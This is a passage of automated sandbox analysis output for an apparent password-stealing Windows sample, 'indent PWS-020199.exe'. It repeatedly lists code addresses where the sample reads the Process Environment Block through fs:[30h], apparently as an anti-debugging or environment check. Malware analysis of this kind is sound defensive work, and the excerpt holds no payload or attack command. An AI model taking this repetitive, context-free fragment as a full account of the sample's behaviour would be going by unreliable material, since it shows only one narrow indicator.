            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01530283 mov eax, dword ptr fs:[00000030h]2_2_01530283
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C02A0 mov eax, dword ptr fs:[00000030h]2_2_014C02A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C02A0 mov eax, dword ptr fs:[00000030h]2_2_014C02A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015462A0 mov eax, dword ptr fs:[00000030h]2_2_015462A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015462A0 mov ecx, dword ptr fs:[00000030h]2_2_015462A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015462A0 mov eax, dword ptr fs:[00000030h]2_2_015462A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015462A0 mov eax, dword ptr fs:[00000030h]2_2_015462A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015462A0 mov eax, dword ptr fs:[00000030h]2_2_015462A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015462A0 mov eax, dword ptr fs:[00000030h]2_2_015462A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B8550 mov eax, dword ptr fs:[00000030h]2_2_014B8550
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B8550 mov eax, dword ptr fs:[00000030h]2_2_014B8550
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E656A mov eax, dword ptr fs:[00000030h]2_2_014E656A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E656A mov eax, dword ptr fs:[00000030h]2_2_014E656A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E656A mov eax, dword ptr fs:[00000030h]2_2_014E656A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01546500 mov eax, dword ptr fs:[00000030h]2_2_01546500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584500 mov eax, dword ptr fs:[00000030h]2_2_01584500
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE53E mov eax, dword ptr fs:[00000030h]2_2_014DE53E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE53E mov eax, dword ptr fs:[00000030h]2_2_014DE53E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE53E mov eax, dword ptr fs:[00000030h]2_2_014DE53E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE53E mov eax, dword ptr fs:[00000030h]2_2_014DE53E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE53E mov eax, dword ptr fs:[00000030h]2_2_014DE53E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0535 mov eax, dword ptr fs:[00000030h]2_2_014C0535
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE5CF mov eax, dword ptr fs:[00000030h]2_2_014EE5CF
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE5CF mov eax, dword ptr fs:[00000030h]2_2_014EE5CF
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B65D0 mov eax, dword ptr fs:[00000030h]2_2_014B65D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA5D0 mov eax, dword ptr fs:[00000030h]2_2_014EA5D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA5D0 mov eax, dword ptr fs:[00000030h]2_2_014EA5D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC5ED mov eax, dword ptr fs:[00000030h]2_2_014EC5ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC5ED mov eax, dword ptr fs:[00000030h]2_2_014EC5ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DE5E7 mov eax, dword ptr fs:[00000030h]2_2_014DE5E7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B25E0 mov eax, dword ptr fs:[00000030h]2_2_014B25E0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E4588 mov eax, dword ptr fs:[00000030h]2_2_014E4588
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B2582 mov eax, dword ptr fs:[00000030h]2_2_014B2582
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B2582 mov ecx, dword ptr fs:[00000030h]2_2_014B2582
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE59C mov eax, dword ptr fs:[00000030h]2_2_014EE59C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015305A7 mov eax, dword ptr fs:[00000030h]2_2_015305A7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015305A7 mov eax, dword ptr fs:[00000030h]2_2_015305A7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015305A7 mov eax, dword ptr fs:[00000030h]2_2_015305A7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D45B1 mov eax, dword ptr fs:[00000030h]2_2_014D45B1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D45B1 mov eax, dword ptr fs:[00000030h]2_2_014D45B1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156A456 mov eax, dword ptr fs:[00000030h]2_2_0156A456
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EE443 mov eax, dword ptr fs:[00000030h]2_2_014EE443
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A645D mov eax, dword ptr fs:[00000030h]2_2_014A645D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D245A mov eax, dword ptr fs:[00000030h]2_2_014D245A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153C460 mov ecx, dword ptr fs:[00000030h]2_2_0153C460
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DA470 mov eax, dword ptr fs:[00000030h]2_2_014DA470
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DA470 mov eax, dword ptr fs:[00000030h]2_2_014DA470
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014DA470 mov eax, dword ptr fs:[00000030h]2_2_014DA470
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E8402 mov eax, dword ptr fs:[00000030h]2_2_014E8402
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E8402 mov eax, dword ptr fs:[00000030h]2_2_014E8402
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E8402 mov eax, dword ptr fs:[00000030h]2_2_014E8402
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AE420 mov eax, dword ptr fs:[00000030h]2_2_014AE420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AE420 mov eax, dword ptr fs:[00000030h]2_2_014AE420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AE420 mov eax, dword ptr fs:[00000030h]2_2_014AE420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014AC427 mov eax, dword ptr fs:[00000030h]2_2_014AC427
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01536420 mov eax, dword ptr fs:[00000030h]2_2_01536420
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B04E5 mov ecx, dword ptr fs:[00000030h]2_2_014B04E5
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0156A49A mov eax, dword ptr fs:[00000030h]2_2_0156A49A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B64AB mov eax, dword ptr fs:[00000030h]2_2_014B64AB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153A4B0 mov eax, dword ptr fs:[00000030h]2_2_0153A4B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E44B0 mov ecx, dword ptr fs:[00000030h]2_2_014E44B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E674D mov esi, dword ptr fs:[00000030h]2_2_014E674D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E674D mov eax, dword ptr fs:[00000030h]2_2_014E674D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E674D mov eax, dword ptr fs:[00000030h]2_2_014E674D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01534755 mov eax, dword ptr fs:[00000030h]2_2_01534755
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153E75D mov eax, dword ptr fs:[00000030h]2_2_0153E75D
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B0750 mov eax, dword ptr fs:[00000030h]2_2_014B0750
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2750 mov eax, dword ptr fs:[00000030h]2_2_014F2750
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2750 mov eax, dword ptr fs:[00000030h]2_2_014F2750
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B8770 mov eax, dword ptr fs:[00000030h]2_2_014B8770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C0770 mov eax, dword ptr fs:[00000030h]2_2_014C0770
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC700 mov eax, dword ptr fs:[00000030h]2_2_014EC700
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B0710 mov eax, dword ptr fs:[00000030h]2_2_014B0710
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E0710 mov eax, dword ptr fs:[00000030h]2_2_014E0710
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152C730 mov eax, dword ptr fs:[00000030h]2_2_0152C730
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC720 mov eax, dword ptr fs:[00000030h]2_2_014EC720
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC720 mov eax, dword ptr fs:[00000030h]2_2_014EC720
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E273C mov eax, dword ptr fs:[00000030h]2_2_014E273C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E273C mov ecx, dword ptr fs:[00000030h]2_2_014E273C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E273C mov eax, dword ptr fs:[00000030h]2_2_014E273C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BC7C0 mov eax, dword ptr fs:[00000030h]2_2_014BC7C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015307C3 mov eax, dword ptr fs:[00000030h]2_2_015307C3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D27ED mov eax, dword ptr fs:[00000030h]2_2_014D27ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D27ED mov eax, dword ptr fs:[00000030h]2_2_014D27ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D27ED mov eax, dword ptr fs:[00000030h]2_2_014D27ED
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B47FB mov eax, dword ptr fs:[00000030h]2_2_014B47FB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B47FB mov eax, dword ptr fs:[00000030h]2_2_014B47FB
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153E7E1 mov eax, dword ptr fs:[00000030h]2_2_0153E7E1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0155678E mov eax, dword ptr fs:[00000030h]2_2_0155678E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B07AF mov eax, dword ptr fs:[00000030h]2_2_014B07AF
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015647A0 mov eax, dword ptr fs:[00000030h]2_2_015647A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CC640 mov eax, dword ptr fs:[00000030h]2_2_014CC640
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA660 mov eax, dword ptr fs:[00000030h]2_2_014EA660
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA660 mov eax, dword ptr fs:[00000030h]2_2_014EA660
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157866E mov eax, dword ptr fs:[00000030h]2_2_0157866E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157866E mov eax, dword ptr fs:[00000030h]2_2_0157866E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E2674 mov eax, dword ptr fs:[00000030h]2_2_014E2674
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C260B mov eax, dword ptr fs:[00000030h]2_2_014C260B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F2619 mov eax, dword ptr fs:[00000030h]2_2_014F2619
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E609 mov eax, dword ptr fs:[00000030h]2_2_0152E609
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B262C mov eax, dword ptr fs:[00000030h]2_2_014B262C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014CE627 mov eax, dword ptr fs:[00000030h]2_2_014CE627
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E6620 mov eax, dword ptr fs:[00000030h]2_2_014E6620
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E8620 mov eax, dword ptr fs:[00000030h]2_2_014E8620
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA6C7 mov ebx, dword ptr fs:[00000030h]2_2_014EA6C7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EA6C7 mov eax, dword ptr fs:[00000030h]2_2_014EA6C7
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E6F2 mov eax, dword ptr fs:[00000030h]2_2_0152E6F2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E6F2 mov eax, dword ptr fs:[00000030h]2_2_0152E6F2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E6F2 mov eax, dword ptr fs:[00000030h]2_2_0152E6F2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E6F2 mov eax, dword ptr fs:[00000030h]2_2_0152E6F2
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015306F1 mov eax, dword ptr fs:[00000030h]2_2_015306F1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015306F1 mov eax, dword ptr fs:[00000030h]2_2_015306F1
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B4690 mov eax, dword ptr fs:[00000030h]2_2_014B4690
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B4690 mov eax, dword ptr fs:[00000030h]2_2_014B4690
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014EC6A6 mov eax, dword ptr fs:[00000030h]2_2_014EC6A6
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E66B0 mov eax, dword ptr fs:[00000030h]2_2_014E66B0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01530946 mov eax, dword ptr fs:[00000030h]2_2_01530946
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01584940 mov eax, dword ptr fs:[00000030h]2_2_01584940
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F096E mov eax, dword ptr fs:[00000030h]2_2_014F096E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F096E mov edx, dword ptr fs:[00000030h]2_2_014F096E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014F096E mov eax, dword ptr fs:[00000030h]2_2_014F096E
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01554978 mov eax, dword ptr fs:[00000030h]2_2_01554978
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_01554978 mov eax, dword ptr fs:[00000030h]2_2_01554978
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D6962 mov eax, dword ptr fs:[00000030h]2_2_014D6962
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D6962 mov eax, dword ptr fs:[00000030h]2_2_014D6962
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014D6962 mov eax, dword ptr fs:[00000030h]2_2_014D6962
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153C97C mov eax, dword ptr fs:[00000030h]2_2_0153C97C
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153C912 mov eax, dword ptr fs:[00000030h]2_2_0153C912
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A8918 mov eax, dword ptr fs:[00000030h]2_2_014A8918
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014A8918 mov eax, dword ptr fs:[00000030h]2_2_014A8918
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E908 mov eax, dword ptr fs:[00000030h]2_2_0152E908
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0152E908 mov eax, dword ptr fs:[00000030h]2_2_0152E908
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153892A mov eax, dword ptr fs:[00000030h]2_2_0153892A
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0154892B mov eax, dword ptr fs:[00000030h]2_2_0154892B
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0157A9D3 mov eax, dword ptr fs:[00000030h]2_2_0157A9D3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015469C0 mov eax, dword ptr fs:[00000030h]2_2_015469C0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014BA9D0 mov eax, dword ptr fs:[00000030h]2_2_014BA9D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E49D0 mov eax, dword ptr fs:[00000030h]2_2_014E49D0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_0153E9E0 mov eax, dword ptr fs:[00000030h]2_2_0153E9E0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E29F9 mov eax, dword ptr fs:[00000030h]2_2_014E29F9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014E29F9 mov eax, dword ptr fs:[00000030h]2_2_014E29F9
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015389B3 mov esi, dword ptr fs:[00000030h]2_2_015389B3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015389B3 mov eax, dword ptr fs:[00000030h]2_2_015389B3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_015389B3 mov eax, dword ptr fs:[00000030h]2_2_015389B3
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B09AD mov eax, dword ptr fs:[00000030h]2_2_014B09AD
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014B09AD mov eax, dword ptr fs:[00000030h]2_2_014B09AD
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
            Source: C:\Users\user\Desktop\indent PWS-020199.exeCode function: 2_2_014C29A0 mov eax, dword ptr fs:[00000030h]2_2_014C29A0
